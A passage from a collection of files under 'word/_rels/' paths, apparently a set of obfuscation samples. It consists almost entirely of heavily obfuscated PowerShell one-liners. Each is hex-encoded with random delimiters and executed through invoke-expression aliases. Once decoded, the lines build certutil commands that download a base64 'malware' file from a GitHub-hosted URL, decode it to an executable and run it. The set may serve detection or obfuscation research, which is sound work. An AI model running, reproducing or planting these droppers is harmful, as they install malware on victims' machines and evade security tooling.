fL27Z2cm27Y73:27L2cZ27N30Z7d:7bN27Z2cL27m6d:6aY27m2c:27L61N6cq27Z2c:27Y7dm61q2e:65L78q65m27:2c<27q72m2f:6d<27<2cL27<63q27:2cY27<6cL20q2dY27m2c<27m75q73Y74q67Y27Z2cq27Z6f<6e<74:27q2cL27Y73L27N2cm27L74N68m27<2cY27<3aL7bL30:7d:7bN30Z7dL75q73Y65L72q73N7b:30<27m29q29m20q20m2d:46Y5bm63Z68N61m52<5dY39<32m29:20q7cN26m28m20L24Y73q68L65Y4cY6cL49q64Z5bL31N5dq2bY24L53q48N65q6c<4cY49L44Z5bq31N33:5dL2b:27L78Z27Z29' -spLIT'Y'-SPlIt 'Z' -sPLIt'm' -sPlIT'L'-SPLIt'N'-sPlIt ':'-sPLIT 'q' -spliT '<'| fOrEaCH-OBJecT { ( [CONVERT]::TOINT16(( [sTring]$_),16 )-As [cHAr]) } ) +"$( SET-iTEM  'vArIaBLe:ofS' ' ' ) "| .( $env:comSpEC[4,15,25]-JoIn'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding3.txt> & ( $verboSePrEFerEnCe.TOstRING()[1,3]+'x'-Join'')( [strINg]::JoIN( '',('26%20%28O20v24{65O6e%56v3a~43O4f-6d~73-50>45v63>5b{34-2cU32v34v2cO32~35>5dO2dU4a%4f>69{4e%27O27O29-20O28>20O28v28-22O7b%31O37%7d%7b~35>36v7d-7b>33{34>7d-7bv31v33%7d~7b-33%39{7d~7b%34{32-7d{7b-33%35-7dU7b~32>30{7d-7b-33v31O7d>7b-30O7dU7bU31{32%7d-7b>36~33%7d~7b-31U31>7d{7b~36>36~7d%7b%34{30%7d>7b{38>7d%7bv33-7dO7b%36~35-7dU7b~35%35~7d-7bv33v38O7dU7b~31O36v7d~7b-34>31O7d>7b{32>32v7d>7b-31U35%7dO7bO31~38~7dv7b{36-34>7d-7bv33O32U7dv7b-32U31O7dO7bO33~36>7dU7b{35>30U7d>7b~32-38~7d-7bU35~31O7dv7b{35{39v7d~7b%35%33O7dO7b{33-30v7d>7bO35{37~7d-7b~32~39O7d{7bO34U37O7d{7b{34v34~7d-7b-36-32O7d{7b-36U30O7dO7bU31%34{7dv7b~34~39%7d{7bU36%7d>7b-35O32~7dO7b-35-38~7d~7bO32~7d-7bO33%37%7d-7b~35U7d-7b{36O31O7d~7bU31-39v7d~7b~33>33~7d{7b%32U36v7dO7bU34O38O7dO7b-32%35{7d>7bU39%7d%7bO32{34>7dU7b>32~37U7dU7b~34O7dO7b%35%34%7d~7b-31%30>7dO7b>32-33O7d{7bv34>35U7d-7b%36-37U7d%7bO34U33>7dU7b>37U7d-7b{31>7d-7b{34O36U7d~22%2d>66v27~3av2fU27v2cO27U6e-64O30%6e>27~2cU27{73{27%2cO27%6eU74{65>27>2c{27U65U27-2c>27>64v27~2c{27{74v69~6c%20U2dU64%65%63~6f~64-65~27U2c>27v30U27U2cv27-63~6fU27U2cO27U64-30%6e{27~2cU27~6e-27U2cO27%75>62U75>27U2cv27{2f{72O61%77{2e-67U69O27-2c-27-6cO20>2d%75v72>6c%27O2cO27>20v63%27{2c~27{68O69{6e%27>2c%27U67O75O6e>6eU27U2c%27v63%65v72-74~27%2c>27U67>2fU74-27v2c~27%6eO70U27>2cU27%20{68>74-74O27>2c{27O2fU6d>27U2cv27~61>6b{65U74>68>69>73v74-27O2cO27v64-30U6e{70-27v2cv27-64%30%6e%27O2c~27>20O63O3a%27>2c-27v69~63%64{30%6eU27U2cU27{75{73{27{2cO27U72~2fO6dU61{6c-77v61v72%65-5fO27v2c>27v70O27U2c~27~64>27v2cv27-70v73O27%2c{27%74-27v2cU27{75-62~6cU27%2c%27-69~27~2cU27~73O70{6cv69v74{20-2d~66>27v2c>27O61~73-27>2cU27O64>30v6e~27U2cv27~74U27-2c~27{63-61U63O68>27-2cv27-72%27~2c~27O61>6d-27~2cU27U65~20~2dv27v2c~27-64v27{2cO27U63O64%30~27-2c>27{75v62U6c-27O2cv27-61v2eU65O78{65U27-2cU27%75>62O6c{69v27~2c%27O64>30{6e-61>27>2cv27%65{72U74U75~27-2cv27-74>65%27v2c{27O62U36~34v5f>6e~6f{62-72U65%61~6b-73v2e~74{78U74U20v63%3a{27-2cv27-20O63~3a%64>30O6eO64O30{6eU75O73%27v2c{27v72O73>64%30v6e>27-2c%27O72-73%64-30U27v2cv27%74>2e%63>6f~6d>2fU69O6dO6a~75{73%27-2c~27{75>74{27{2c~27{30O6eU27~2c%27{65-72>27-2c{27%64>30O6e{64O30-6e~75U73-65U27~2c>27v30v6eU61{3b~27%2c-27v30>27U2c~27-6e{64>27{2c~27v74~68O27v2cv27{65U73v27%2cU27O6eO27U2c~27{73O65{27{2c>27~69-63>27%29~29-2e-52%45>70-6cv41~43v65-28{28%5b~43O48v41v72>5d-31v30U30v2b>5b>43{48{41U72v5d~34U38U2b~5bO43~48v41O72U5dO31~31v30U29U2c%27>5c-27-29-20v29' -sPLit '{'-SpLiT 'v' -SPlIT'O' -SPlIT'U' -SpLIT '>' -SpLIt '%'-splIT'~'-sPLIT'-'|%{( [cONvERT]::toinT16( ( [striNg]$_ ),16 ) -As [Char]) } ) ) ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding3_compress_1.txt>"$(SeT-IteM  'vAriABLE:ofS' '' )" +[STRING]( '2eV20V28%20:24:50O73%68n4f:6dO45%5b<34<5dV2b!24%70<73!68V6fn4d{65%5bn33%30:5d%2b%27%78<27:29:20V28:20n28%28%28V22n7b%32V35!7dV7b!35O36{7dO7bO33<39:7d!7b<35<37V7dV7b%34V30{7d%7bV35O31{7d<7b{33<38%7d%7b%33<31O7d%7b%31%30O7d:7b:35O39V7dV7b{33V7d<7bn35O32V7dO7b:31<34!7dV7b!31n7d:7bO34V33V7d!7b{36!33%7d<7b!31n33<7d:7b<35{35%7d<7b%34V35!7dV7b!34%39!7d:7bn31V36n7dn7bV32!7dV7b{36{35:7d:7b%32V31n7d{7bV34n36n7d!7b!33O37:7dO7bn32:38<7dO7bn31<38V7d!7b{34V37:7d%7bO34n31{7dO7b!35{33:7d!7b:32O32:7d{7b<37n32V7dV7b{32!37<7d%7b<39n7d!7b:37<7d{7b<32%34O7d!7b:33%30<7d%7b<36n31{7dV7bn31!35!7dO7bV32%30V7dn7b%36:32O7dO7b<34{32:7d<7bO33%32%7d!7b!35n38:7d%7b{33O33<7dn7b<35{7dO7bO34%7d%7b{31%39%7d%7bO33O36%7d%7bn33%35V7d:7b%38:7dV7bO37!31!7d:7b!34<34<7d{7bV36<38V7d!7bO31V32n7dn7b{31%31%7d<7bn36<30O7d:7b%32%39O7dn7bV30O7d<7b:35!34{7d%7b{33V34:7dO7b{31<37n7d%7b!37%30%7d<7bO36%36:7d!7b!36n7d%7b%32V33!7d:7bV32{36<7dO7b%34{38{7d%7b<36<37V7dn7bO36O39n7d{7bn36!34V7d<7b:35<30!7d<22!2d<66<20V27<62%6c<69{63{78{27!2cV27V72%27O2c<27{2e:27:2c!27{66%20V68:74V74:70{27O2cO27!69{63!78{32V61n78%32<61n61<3b<27!2c!27V78O32n61!70%75n62%6c:27n2cV27V78n27{2c%27:72<65%5f<62O36V34O27<2c<27V74%69O6cV20!27%2cO27n74O65%72O2f!6d:61%6cO77n61<27%2cn27:70!6cV69%74:27n2cV27:61%27!2cV27:61!78<32%61:75{73%65{72O73%78V32<27<2cn27<67V69!74{68!75:27%2c{27{3aO2fO2f{27{2cV27O73n27<2c:27{74:65!6e{74!27V2c<27!63O27<2c<27<67:75<6e:6e{61{6d%61V6b{65:74!68!27%2c:27%20O63<65:27n2cn27V2e!74n27{2cn27{6f{6dO27:2cV27<74:2f%27V2c:27:32%61{75V27%2c<27%5fO6e<6fV62%72{27!2c%27<63{65O72:74!27n2cV27%73%65{27<2c%27n61O73:27V2c<27<73n74:27!2c%27<61%70<75n27!2c{27<65!61O27<2c!27:73n27V2c%27{63{3a:78{32n27n2c!27{61:75!73%65!72V73V78{32%61!27n2cn27!78<32{61n61!20n27V2cn27<74{75!27:2c<27O72O27{2c<27<6a<75:27<2cn27O65V20{2d%27:2cO27<74:27:2c<27n6c<20O2dn75n72n6c%63<27O2cV27{73%74<68%69!6e<67<2f<74%27!2c{27V20!27!2cV27V61n77{27{2c!27%63V6f%64{65V20n63O3a%78n27<2c%27%75O73:65:27:2c{27n2f{69<6dn27{2c%27:69%27<2cV27%72V73<78:32!61{78V27n2cV27!72n63%6f{6eO27!2c%27%65<27!2c:27:61V63!68V27%2cO27%73O27:2c<27O65:73V27%2cV27{32n61{27n2c!27n62!27!2cn27<75{27<2c<27V69%27%2c<27V61%78%32!27<2cV27<20%2dO27!2cn27V78{32V27<2c{27n6b%27O2c<27V78O74%27V2cO27:2e<27V2c:27:6cO69V63%78O32<61<78%32{61O61<2e<65%78V27V2c<27!63<27V2c:27O78%32!61n27<2c!27<32<27<2c:27!32<27%2cV27{61<70{75%62V27%2c{27%3a<27{2c{27n2dn64:65{27O2cn27O6dO27O29!29O20{2dO52:45!70<6c<41{43<65{20{27<78V32:61<27<2c{5b:63:68V61:72{5dV39!32<29V29V20'-spLiT'<' -SplIt':'-spLiT'V'-sPlIT '!'-SPliT'{' -splIT '%' -SPlIT 'O'-SPlit'n' | foreACh{([coNVeRt]::toInT16( ($_.toStrING() ), 16 ) -as [CHar]) })+" $( seT-itEm  'variABlE:ofs'  ' ')"| &( $shELLID[1]+$sHELliD[13]+'X')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding4.txt> &( $env:COmSpEc[4,15,25]-join'')( "$( Set-itEm  'VarIAblE:ofs'  '')" +[sTrIng]( '20y26&20!28{20;24y56!45y72%62&6fy53W65!50W52&65{66&65&52G65;4e&63%45%2e%74G4f&53y54!52W69&6e&47;28{29y5b%31&2c&33W5d;2b{27W58W27W2dG4a;4f!69%6e&27y27{29%28!20!28G28&28W22%7b%35!37!7dy7b%37&7dW7bG34W34;7d{7b{32!38&7d%7b%33W34;7dy7by33y37W7dG7bW34G31&7d!7by34!7d%7bG32y32;7d%7b&35G39W7d;7b%32{36W7d%7b;31;30W7d;7b%34y30!7d!7b&32;31&7d{7b%32&37W7d;7b!35%30;7d%7by34&33!7d%7bW31;34;7d&7by36!7d!7b%33%35!7dW7bG33!33%7d&7b%33W7d;7b;34G37%7d%7b&30;7d;7bG33!32W7d!7b&34y36!7d%7b{32{30G7d!7b&31{39%7dW7b;31G33G7d%7b%35;33!7dy7b%34W35{7d%7b&35;34;7dG7bG34%38y7d&7bW38{7d;7bG33;38;7dy7by33&31{7d{7b%31{32W7d%7bW35y35y7d;7b&34{32%7dW7b{35{38%7d!7b;35W32&7dy7b;35&31;7dG7b;31&35G7d{7b{31%37!7d!7bG35y36{7dW7b{33W36;7dG7by32G33{7d{7bW39&7dW7b{32{34%7d!7b%31%31!7d!7b%32y7d{7bG31{7d!7b%32{39%7d&7by31&38!7dG7b%33%39%7d%7b%31;36{7d%7b!32{35&7d&7b%34!39%7d%7bG35W7dG7b&33;30;7d%22;20%2dy66;20y27!73&2e&27y2c{27W3ay41%43;38&27%2c{27%20!63%27;2c;27{72G65G5f%62y36y34G5fy27y2cG27%2fG72y61&77W2e;67G69;74G68!75!62!75%27&2cy27%43!38{61&2e%27;2c;27;74y65;73!74{2fy6d&27%2cW27%74{69!6c;20;2d%75y72y27!2c;27G3b&27%2cG27G38&41!27%2c%27{6d&2f{69y6d&27&2c%27{38{61&27{2cy27!75!74!69{27;2c{27{41;43{38{70&75G27W2cG27{6b%65&74W68y69G73{74;68%69G6e%67&2fG27W2c&27;38G27;2cW27{41%43!38G70%75;27!2c&27;41y43!38W70%75;27!2c%27;43y38&75G73W65W27%2cG27;73;41;43!38W27y2cW27W73{65%72!27{2cy27!75%73!27G2cW27;73!27y2c{27&63G41{43!27W2c&27{43;27&2c!27;62!6cW27G2c{27;6e&74%65&6e%74{2e%63W6f{27y2c;27{74W67W27{2c;27y68%65{20W27{2c;27&41&27W2c!27&65W78%65%27G2cG27W72&74{27&2cy27%74%78;74y20G63{3a&27;2c%27&2f%6d%61W6cy77%61G27!2c;27!2dG73y70&6c%69&74!20%2dW66{20%68{74&74W27y2c!27%61W73G74!65&72;27G2c%27y6c%69W27G2cy27;70&73{3a!27!2cW27!20W63G65!27y2c{27W72{73&41G43%38G27W2c!27{6aW27%2c&27!2f!27W2c%27G3a!41&43!38G27W2c;27G6dy61&27G2c;27G6cG63;61%63;27!2cy27;63G41;43%38W27!2c&27%41%43{38%41;43{38!75{27!2cG27&6e!6f&62%72G65&61y6bG27G2c{27W61&27!2c!27y69G63;41;43!38G41;27%2cy27%75W6e%6e;61{27G2c&27y72%73G41&43{27&2c%27y38W75G73G65G27;2cW27&62!6c;69!27G2cy27G41!43G38&27W2c!27%6c;20%2d;64{65y63y6f;64&65&20&63&27{2c!27G62{27&2cy27!63y65y72%74&75G27W2c%27{41!43%27{2cW27W65!72!63W6f{27!29;29y2d&43%72&45!70G6c&41y63!65{20W20%28!5bG43W68%41G72%5dy36G35&2b!5b&43;68{41y72%5dG36y37y2b{5b;43;68%41&72y5dy35y36W29{2c;5by43&68%41y72G5d%39G32W29W20{29' -sPlit 'G'-spLIT'{' -SPlIT ';'-sPlit'y' -spLIT'%'-SPLit '!' -splIT'W'-SPlIT'&'|%{ ( [ChAR] ([coNvERT]::tOiNt16(( [strInG]$_),16 ))) })+"$(SET-iTEM  'VARiable:ofS' ' ')" ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding4_compress_1.txt> -Join ( '20}28S28~28S22q7bS34Y34~7dq7b~31!39Y7d}7b~38q7dn7bS37S7dq7b~33l39S7d!7bq33!34l7dl7b!32n37n7dY7b!33l37!7d}7b!32}38~7dl7bn39}7d~7b}34~33q7dn7bY33l31n7dS7bS32~31q7d~7b}34}32Y7dl7bS31q7d~7bS33Y7dY7b}33}30q7dq7bn34q7d}7b!33!35}7dY7b~30l7d!7b}31Y35S7dS7b~31n38~7d~7b~32!33}7d!7b~33n33q7dY7bS32Y32S7dq7bn33~32n7dS7b~31n32l7dq7bl32l30!7dl7bY35Y7d~7b~31!31!7dl7bY32Y35n7dq7bS31}36q7dY7bl32S39q7d!7b}34}31~7dq7b~31l30!7d}7b}32l34n7d!7bl33!36S7dq7bl32S36}7d~7b~31~33q7d}7bS33n38~7d}7bn36S7d}7bY32S7d!7bl31~37}7d}7bq34~30S7dl7bS31l34l7dY22q20S2d}66~27S34!5fn6eY6fq62n72S65~61n6bS27}2cq27}74q68q69l73l74Y68~69q6en67!2fY27Y2cq27q7bq30l7d!7bq27l2cY27l74n65}73S74S2fn6d}61S73l74n65}27}2cn27q6c!27q2cl27!63n6f}64Y65S20q63~3aY7bn30l7dY7bq30n7d!75~27}2c}27~75!62S6c!69Y63!27~2cl27l74~27n2cl27~20n2dn66n20~68Y27~2cn27!63}6fq6e!74S65Y6eq74q2eY27~2cl27q63}3a}7bn30!27!2c!27S73q65q27Y2c~27l30l7d}7b~30q7d~61n3bS20S63n65l72q74S75q74n69!6cS20q2dY27~2c}27Y7d}27~2cq27S2e}65Y78l65q27~2cS27S73n27!2cl27}73q7b~30S7d}7bq30~7dq70n27!2c}27S30Y27S2c!27}2el74n78S74}20~63l27n2cl27Y63}68!65q20}2d!73!70~6c~69}74l27l2cS27~64Y65q27Y2c}27l61n27Y2c~27}7bn27q2cS27!3a}7bS30}7d!7bY27S2cY27q7dl7b!30n7d!75}27Y2c~27n72!27q2c}27S7dl7bY30q27~2cl27S74}27l2c}27~75~62q75Y73n65Y72~27q2cY27q75n62!6cn69q63Y7b!30!7d~7b}30S7d}27l2c!27}72Y2f}6dn61!27q2c~27q6d}2fq69S6dn6aY75~73~74n67l75}6e}6eY27n2cq27q30S7dn7b}30}7dq70!75q62}6cl69q63S7bY27~2cq27q30Y7dq75!73Y65q72}73!27l2c!27}72S61l77q2e~67l69n27l2cn27q77~61}72S65Y5fn62}36n27S2c~27!73!65~72Y73n7b!30q27!2cl27Y68}27S2cq27}70!27S2cS27}74n70!73~3a}2f!2fq27Y2cq27n7dn61}27}2cn27n61n20!27l2cq27~6dS61l6b!65S27!2c~27q63q6fS27q2cS27~63n65Y72!74q75l74q69q6cS20~2d}75Y72S6c!63Y61}27S29!29n2dn46}20n20Y5bY43}68Y61Y72Y5d!39n32q29n20S7cn2e}20!28~28S76}61n52}49!41q42n6cY65~20~27~2aq6dl44Y52Y2an27Y29}2eY6e}41!6d}45~5bn33S2cY31S31}2cY32~5dn2dY6aY4f!49}6en27}27l29' -spLIt'}'-sPLit'n'-SPlIt 'S' -sPLit'!'-sPLiT'l'-Split'Y'-sPLIT'~'-sPLiT 'q'| fOReacH-oBJEct { ( [ChaR] ([CoNveRT]::TOinT16(([stRing]$_ ) ,16)))}) |& ( ([strinG]$VeRBoSepRefErEnCe)[1,3]+'X'-JoIN'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding5.txt>. ( $Env:ComSpeC[4,24,25]-jOiN'') ( " $(Set-VarIAble 'Ofs'  '' )"+ [STRing]( '20<26%20z28&20N24z70<73%48N4f~6d%65~5b%34N5dU2b%24%50~73N48N4fU4dz45_5bU33U30<5d<2b<27_58U27N29z28%28_28N28%22z7bN33z34N7d&7b_32~39N7d_7b_34&37N7dz7b&31<7dN7bz33&38%7dz7b&32%30_7d~7bz34_35z7d_7bU34N34U7d_7bU32U37z7d<7bz33<7d&7bU31<33%7d&7b&31~30<7d_7bz38~7d_7b<32<33<7d&7b&31<32~7dU7bU32&7dU7b<33%31U7dz7b<32N35~7dz7b%34N30~7dU7bU33_36%7dU7bz34_7d~7bz32<34~7dU7b~34%31z7dN7b%34_33N7dU7b~31~37<7d<7b&31%36~7d&7b~32&38&7dU7bN36N7dU7b&33&33z7dz7bU32<31<7d<7b<33<35%7dN7b%31<35N7dN7b%32_36U7dU7b_39<7d%7bU34U36_7dU7b~31U31%7dN7b&35~7d_7bU37&7dU7b&31N39z7d<7b_33z39<7d%7b~33~37~7d&7b<33%32%7dz7b<34_32&7d%7b~30<7d&7bz31&34<7dU7bN31%38U7dN7b~33U30<7dN7bN32&32~7d~22<2dN66%20U27z7b<30U7d_70%27U2c<27<74N74z70~73&3aN2fz2f%72&61~27~2cz27_6e<6f%62U72N27N2c~27~2f&69~6dz6a&75<73%74%67~75~6e%6eU61U6dN61N6b&65U74~68U69~73&74%27U2cz27<65~72U73N7b&30%7d&7b%30N27&2cz27&30z7dN27z2c<27%6cU20%2d<27U2c~27U61&20<63<27<2c<27z74U65&72_2f_27<2c~27%7bU30U7d_7b&30%7dz70N75z62&27%2c%27N65~73z74%2fz6d%61%73&27U2c%27~30z7d%7b<27z2c_27%6cU77U61z72N65%5fU62<36_34_5f&27N2cz27~68~69%6eN67z2f_74&27U2c_27_75~62&6cz69_63z7b_30z27N2c_27<7b_27<2cU27U75&27%2c%27N7d<7b%30N7d~61%3bN20<63~65<72z74%27%2c~27U7dU7bN30N27N2c&27~3a%7b%30&7d<27&2c_27N74N68<75&27U2c_27&7b%30%27%2c~27<2ez65z78~65N27%2c~27&6d<61_27<2cz27_7dN70~27N2cN27U63&27z2cN27<30z7dU75z73N65_72%73&27&2c~27~2eU63<6fU6dz27<2c_27&74<69~27~2c~27~69N6c&20%2d<75U72&6cz63&61U63_68_65%20N2dz73z70~6c_69<74U20_2d_66<20_27%2c~27_7dU61_27<2c<27&65_61_6b<73~2eN74%78z74z20_27z2c%27<7bU27%2cN27&64<65N63_6fN64~65z20U63z3aN27&2c~27z63&65&72~74N75U74&27&2c%27<7dU27U2cz27&73<27~2cN27~7dN75%73_65U72~73U27~2c<27_77U2e%67U69N27_2c_27U7b<30&27N2c<27_3a%7b~30%7dz7bU30&7dz75<27_2cz27~75<62~6cz69<63<7bU27z2c<27~30z7d%27N2cU27%30&27<2c~27z72_63_6f&6e%74&65_6ez74~27%2cz27N62%75~73z65&27_2c_27_6c~69_63_7b%27<2c<27_68%27%29%29N2dz66U20~20%5b~63z48~41&52U5d<39N32<29<29' -spLIT 'N' -splIT'<'-SpLIT'z' -SpLiT '~' -SPLIT'U'-SpLIT'%' -splIT'&' -SPlIT '_'|fOrEACh-obJeCt {( [CHAr] ( [cOnVErt]::TOInt16(( $_.TOsTriNG() ),16) ))} ) +" $( seT-Item 'vArIABlE:OfS'  ' ')" ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding5_compress_1.txt>"$(set-Item 'vAriAblE:OFS'  '')" +[stRING]('28z28P28P22P7b{30P7d&7bP32X30&7dz7bz33P32&7dz7bX34P30{7d{7b-34-32z7d&7bX34L37X7dX7b{33X38X7dL7b&34-7dX7bP31z30&7dL7b-31P31{7d&7bz33z30&7di7bX34P33X7dz7bL33X33&7d&7bi33&31-7di7bX31L39-7d&7bX34P36P7dL7bL34&38&7dL7bi31&38z7di7bi33L34P7d{7bi33-39i7d-7b&32i34-7d-7bL33i37&7d{7b-31P32i7dz7bX32i38z7d-7bi32{7d&7b-31&35-7di7bz36P7d{7bz33-7d{7bL32L33{7d&7bz31{33P7d&7bX31X37P7dL7bi33-36L7dL7bP32i31&7d{7bL38z7d&7b{31i34&7d{7bP34L31L7di7bi32-32P7dX7bX32X39i7d&7bL31z7dz7bz34&34i7d-7b-31i36&7d&7bP34-35{7dP7bP33{35-7dX7bP32P36X7di7bi32-35&7dX7bP37z7di7b{32L37z7dX7b&34X39&7dP7b&35i7di7b{39P7d&22{2dL66&27P63P65L72-74z75P27P2c-27P7di7bz30i7dP75-73P65L27X2ci27z61{6cP77i61X72i27-2c&27z62-72X65{61i27L2cz27-66P27z2cL27L30X7dz61-2ei27P2cP27X5fz62X36{34X5fL6e{6f-27L2c{27P7bz30i7d-70i75z27-2cP27&65-72P73P7bi30-27z2cz27z65{78P65P27i2c&27&20{68-74X74X70z73X3aX2fL2fL72&27i2cX27P61L27&2c&27P74L2fX6dz61&73P74P65i27P2ci27P73L2e&74-78L74-20P27X2cL27i7dz7bz30{7d{27i2ci27&65{27{2cz27P73i7b&30{7dX7bi27{2ci27i63z27L2c-27&6bX27-2c{27P6a{27&2cP27z74P69z6c-27P2cL27L7b-30X7di75-73&27&2ci27&74z75L74P69&6c&20-2dL64X65&63L6f&64X27i2cP27-6bi27z2ci27&69{73&74P68X69z27L2cX27&65X72-73&7b{30P7dL27{2cz27i73P27P2cz27L62i6cP27&2cX27&72P2f&6dX27i2cX27P65X20X63-3az7bi30P27X2cP27X77X27&2c&27z72&63P6fX6ei74P65i6eX74P2ei63X6fi6dz2fX69z6dX27z2cP27-20i27z2cP27L75z73X65{27X2ci27-65{27z2c-27X30P7dL61{20z63{3ai7bX30P7dz7b-30X7di75-27L2cX27-3a{7bz30L7di27&2cP27&6eX67z2fi74-65L73X27i2cX27z70L6cP69&74P20X2dP27{2cX27{74i68X27P2c-27&2dP75{72i6ci63z27z2cL27z70L75-62-6c&69z63z7b-30L7d{7bL30z7d-61-3b-20X63&65&72{27X2cX27-61-63L68{65P27-2c{27L2eL67z69-74X68P75&62i27-2cX27-72{27P2c{27{30X7dz70P75-62P6c{69P63z7bz30i7dz7b-27X2c-27&75L73P74-67L27-2c-27P20i2d-73i27-2c{27i75L6ei6ez61P6d{61z27i2cX27&69{63-7b{30P7d{7bi27P29{29i20X20&2di46X20z5bP43{48&61i72z5d-39L32-29z20-7cP20{69i6ei56L4f&4bL65X2di65P58X50P52P65L73&53z69{6fX4e'.SplIt('L{PXz&i-' ) |foREAch-OBjecT{ ([conveRt]::toint16( ( [sTRING]$_) , 16) -AS[CHAr])}) +" $( SeT-ITEm 'VAriaBlE:oFS' ' ')"| &( $pShomE[4]+$pshomE[30]+'x')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding6.txt>" $( sEt-iTem 'vaRIablE:ofs'  '')" + [STRInG]('20O28r28G28O22!7b_35!32G7d_7b~33_33l7dl7bl33G31-7d!7bO36~31r7dl7b-33!7dl7b~36r37-7dG7b~34_32r7dl7br39-7dl7b~35G39O7dO7b!32r37G7dl7bO31l32!7dO7bO34l34l7d_7b~32l35_7dG7b_35!33_7dG7b~30_7dG7bO34_31~7dl7b~36~30l7dl7b~38G7d!7b~33G35_7d!7bG36r7d_7bl34l35_7dl7br33_34!7d-7b~31~31G7dl7b~34l33_7dG7b-35~35!7d_7b~32r36~7dO7bG33l37l7dO7b~33-38_7d!7br31-7d_7b-35~37l7dl7b!34~36G7dO7bl31G33~7d_7b~34_7d_7br31G34-7dG7bO34_30_7dG7br37_7d~7bG32_32l7dO7b_31-39G7d~7bl35~34_7dG7b~35-30r7dr7b_32!38G7d!7b_36-33~7dO7bG35!31~7d-7b-32l33O7d-7bG31l30l7d!7bO34O37O7dG7b~32l30G7dr7bG31~35-7dO7bl36l32-7d!7b!36r34!7d-7bG35O36l7d-7b!36G35!7d~7br32!7dl7b~34O39~7dG7b~32l31O7d_7bG33r32!7dO7bG33~39-7dl7bO32l39r7dl7bG31_37!7dG7b!35O7d_7b~36~36!7dO7bG33-30~7d_7b!36~38_7d-7b_32l34_7dO7b-34O38-7d_7b_31!36G7d~7b!31-38l7dO7bO33l36G7d~7bG35-38~7dl22r2dl66~27r65~72-27-2cr27l2f!6d-27G2c-27-76r34-62l76l34_62O75O73r27-2c!27_61G63!68-65-20G27~2cr27_65~5f!62!36l34O5f-6el6f~62G72!65~27G2cO27-76G34~62r61O20-63l3aG76O34l27~2c-27!6el61~6dr61r6bO65O27r2c_27~76r34!62!76r27r2c_27G67~27-2cl27~20!2d-66O27l2cr27l69l63!76G34l62-76G34l27l2c!27!74_68l69r6e_67_27~2cO27O73~3a~27l2c-27G61l72_27~2cl27O61-6b~73_2e!74O78-74O20~27-2cO27~72l74~75_74~27r2cr27-69O63r76_34G62r76l27-2c_27~62O27l2cl27~34r27G2cl27l62_75G73!27O2c_27O61_3b~20~63~65-27!2c~27l34-27~2cG27~34_27O2c~27G75O62-6cr27_2cO27-76_34~27~2c~27r61~77-2e-67~69r74G27l2cO27!74O27!2c~27G74G74r70G27G2c_27O34O62~27l2cG27~6c~69O63G76_34!27O2c!27r75G73-27O2c-27~74-69-6cG27-2cr27l62G76-34G27_2cl27G74G75O27O2c_27l69l73-27G2c~27~75~6e-27G2cr27-62r27r2cG27_65~27~2c!27-72-27-2c!27_62-70-75G62G27-2c~27G63-3a!27r2c-27!63l6fl6er74l65!6eO27!2c!27-69-74_27l2cr27r2fG74-65_27_2cG27!2fr2f!72O27~2c!27O74G68r27!2cr27!6cl77G27G2cG27~62-27!2c~27~62r76G34l62l70-75G62l6cG27r2c-27l65_72r73!76l27!2c~27l73-76-27~2cO27r34l62~70l27r2cr27~63~65O72r27l2c-27!68l75O62r75l73G27l2cr27-65O72r27_2cO27~73O74-2fr6d!61l73~27!2cG27G65O20r63!27O2c~27G61-27G2c-27O61l2eO65G78!65G27G2c_27~20~68l27-2c!27r74r2e_63G6f~6dO2f_69l6d~6a~75l73_74!27O2c~27G20~2dO75~72l6c!63l27G2c~27r69r6c-27~2c!27r76_27G2cr27~20r2d_64l65r63~6f_64O27O2c_27-3aO27_2cO27_62O76r34O62~27r2cG27~2dr73O70~6cl27G2c-27r65-72r73-27-29_29r20~2d!63-72!45!70r4cr61l43G65_28-5b_43l48O41O52-5dG31G31G38_2bG5b~43~48~41G52!5dr35r32r2bl5bO43-48G41!52-5d!39_38~29~2c~5b!43G48-41_52O5dO39O32G29G20_7cl20l69~45O58'-split 'G' -spliT '~' -spLIt'-' -sPliT'O' -SpLIT '!' -sPLit 'r'-spLIt '_'-SpLIT 'l'| fOREACH{( [CHaR]( [CONverT]::toinT16(([StrINg]$_),16 )))} )+" $(sEt  'oFs'  ' ') "|invOKe-ExPression

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding6_compress_1.txt>. ( $SHELLID[1]+$ShElLid[13]+'x')(( '28z28x28z22U7bU35q39l7dk7bU31l7dx7bM34-32-7dx7bz37M7d-7bz34l38M7dU7bx37q30U7dl7bU36-31k7dz7b-34U31U7d-7bz31k32M7dl7bx36-38k7dz7bz34-30z7dl7bq39M7d-7bl36l30x7dx7bU33l7dz7bl32x33x7dz7bU35U33l7dq7bz32-36z7dM7bU32U38l7dM7bq36z33x7dU7b-33z37z7dU7bq31z39U7dU7bM33-36M7dM7b-33-39z7d-7bq34x39M7dq7bl32l34k7dl7bx36M34q7dq7bz36-7d-7b-32M7d-7bx31x33q7dl7bx33x38x7dU7bx31x35-7dl7bx34l35U7dl7bz35l36-7dU7bM32l35k7dU7bU36k35l7dl7bk33-33z7dx7bz33-32M7dk7bq32z39k7dU7bk35M38k7dl7bk30l7d-7bz35U31k7d-7b-34z36q7dx7bl38k7dq7bq31z36-7d-7bU35z32-7dq7bx35M7dz7bU34-37-7dl7bk35l30U7dM7bx31z31q7dz7bM32M31k7dU7bl34k7dM7bz32z32-7dM7bU31q38M7dq7bM32x37z7dU7bM34M33x7d-7bz34q34-7dz7bz33q34q7dq7bM35-37k7d-7bM32M30z7dk7bk31U37x7dM7bM36l32k7dk7bM31M34q7dk7bx33-35-7dk7bz36q39l7dk7b-36x36x7dx7bk35U34k7dq7bM36M37U7dz7bk33U31k7dk7bM35M35k7dM7b-31q30q7dk7bk33M30z7dM22z20q2dU66M27-73k27x2cM27-65U27M2cU27-61q6c-27U2cz27z68M75l62l75x27l2cq27U6fk64U27-2c-27z63q27z2cz27q72l2fz6dk27-2cM27l75l72x6cx27U2cU27-73M7bM30M7dq7bl27U2cz27U67x27x2cM27k6cl27l2cl27x69U27-2cq27l20k68M74-74M70q27M2cx27k77M61l27l2cM27U7bU30l7dz7bq30k27k2cz27l5fU62z27q2cU27k30U7dx27l2cl27U62l6cx27-2ck27x6